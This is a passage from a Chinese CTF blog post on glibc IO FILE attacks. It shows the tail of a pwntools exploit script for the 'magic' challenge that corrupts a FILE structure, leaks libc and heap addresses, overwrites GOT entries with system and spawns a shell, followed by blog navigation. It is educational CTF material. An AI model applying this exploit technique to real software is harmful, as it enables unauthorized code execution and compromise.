class="string">b&#x27;spell:&#x27;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    sa(<span class="string">b&#x27;:&#x27;</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_wizard</span>(<span class="params">name</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    sa(<span class="string">b&#x27;name:&#x27;</span>, name)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;localhost&#x27;</span>, <span class="number">20000</span>)</span><br><span class="line"><span class="comment"># p = remote(&#x27;223.112.5.141&#x27;, 55684)</span></span><br><span class="line">create_wizard(<span class="string">b&#x27;11111111&#x27;</span>)</span><br><span class="line">wizard_spell(<span class="number">0</span>, <span class="string">b&#x27;1&#x27;</span> * <span class="number">0x20</span>)</span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">11</span>):</span><br><span class="line">    wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00\x00&#x27;</span>)</span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00&#x27;</span> * <span class="number">20</span>)</span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">wizard_spell(<span class="number">0</span>, <span class="string">b&#x27;\x00&#x27;</span> * <span class="number">3</span> + p64(<span class="number">0x231</span>) + p64(<span class="number">0xfbad24a8</span>))</span><br><span class="line">wizard_spell(<span class="number">0</span>, p64(<span class="number">0x6020D0</span>) + p64(<span class="number">0x602120</span>))</span><br><span class="line">leak = r(<span class="number">0x20</span>)</span><br><span class="line">leak = [leak[<span class="number">8</span> * i : <span class="number">8</span> * (i + <span class="number">1</span>)] <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>)]</span><br><span class="line">leak = [u64(i) <span class="keyword">for</span> i <span class="keyword">in</span> leak]</span><br><span class="line">libc_base = leak[<span class="number">0</span>] - so.symbols[<span class="string">&#x27;_IO_2_1_stdin_&#x27;</span>]</span><br><span class="line">heap_base = leak[<span class="number">2</span>] - <span class="number">0x10</span></span><br><span class="line">log.success(<span class="string">&#x27;libc_base = %#x&#x27;</span> % libc_base)</span><br><span class="line">log.success(<span class="string">&#x27;heap_base = %#x&#x27;</span> % heap_base)</span><br><span class="line"></span><br><span class="line">system = libc_base + so.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">ptr = heap_base + <span class="number">0x2a0</span></span><br><span class="line">wizard_spell(<span class="number">0</span>, flat(ptr, ptr))</span><br><span class="line">wizard_spell(<span class="number">0</span>, flat(elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x20</span>, elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x28</span>, elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x20</span>, elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x28</span>))</span><br><span class="line"></span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">wizard_spell(<span class="number">0</span>, <span class="string">b&#x27;\x00\x00&#x27;</span> + p64(libc_base + so.symbols[<span class="string">&#x27;atoi&#x27;</span>]) + p64(<span class="number">0x400886</span>) + p64(system))</span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">itr()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>1K0CT B14s
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://ikoct.com/2025/02/25/IO-FILE%E6%94%BB%E5%87%BB/" title="IO FILE攻击">https://ikoct.com/2025/02/25/IO-FILE攻击/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn/" rel="tag"># Pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/02/12/Vsyscall%E5%9C%A8Pwn%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/" rel="prev" title="Vsyscall在Pwn中的应用">
      <i class="fa fa-chevron-left"></i> Vsyscall在Pwn中的应用
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/03/03/Linux%E4%B8%AD%E7%9A%84%E8%99%9A%E6%8B%9F%E6%96%87%E4%BB%B6/" rel="next" title="Linux中的虚拟文件">
      Linux中的虚拟文件 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8A%AB%E6%8C%81-IO-buf-base-%E6%8E%A7%E5%88%B6scanf%E8%BE%93%E5%85%A5%E9%87%8F"><span class="nav-number">1.</span> <span class="nav-text">劫持 _IO_buf_base 控制scanf输入量</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BA%94%E7%94%A8%E4%B8%BE%E4%BE%8B"><span class="nav-number">1.1.</span> <span class="nav-text">应用举例</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-echo-back"><span class="nav-number">1.1.1.</span> <span class="nav-text">[攻防世界] echo_back</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8A%AB%E6%8C%81-IO-write-ptr-%E5%92%8C-IO-read-ptr-%E5%AE%9E%E7%8E%B0%E4%BB%BB%E6%84%8F%E5%86%85%E5%AD%98%E8%AF%BB%E5%86%99"><span class="nav-number">2.</span> <span class="nav-text">劫持 _IO_write_ptr 和 _IO_read_ptr 实现任意内存读写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E5%86%85%E5%AD%98%E8%AF%BB"><span class="nav-number">2.1.</span> <span class="nav-text">任意内存读</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E5%86%85%E5%AD%98%E5%86%99"><span class="nav-number">2.2.</span> <span class="nav-text">任意内存写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BA%94%E7%94%A8%E4%B8%BE%E4%BE%8B-1"><span class="nav-number">2.3.</span> <span class="nav-text">应用举例</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-magic"><span class="nav-number">2.3.1.</span> <span class="nav-text">[攻防世界] magic</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E5%86%85%E5%AD%98%E8%AF%BB%E6%B3%84%E9%9C%B2libc%E5%92%8Cheap%E5%9F%BA%E5%9D%80"><span class="nav-number">2.3.1.1.</span> <span class="nav-text">任意内存读泄露libc和heap基址</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E5%86%85%E5%AD%98%E5%86%99%E8%A6%86%E7%9B%96got"><span class="nav-number">2.3.1.2.</span> <span class="nav-text">任意内存写覆盖got</span></a></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="1K0CT B14s"
      src="/images/myavatar.gif">
  <p class="site-author-name" itemprop="name">1K0CT B14s</p>
  <div class="site-description" itemprop="description">残りの人生、私にくれませんか？</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        <!--
-->

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">1K0CT B14s</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">486k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">7:22</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
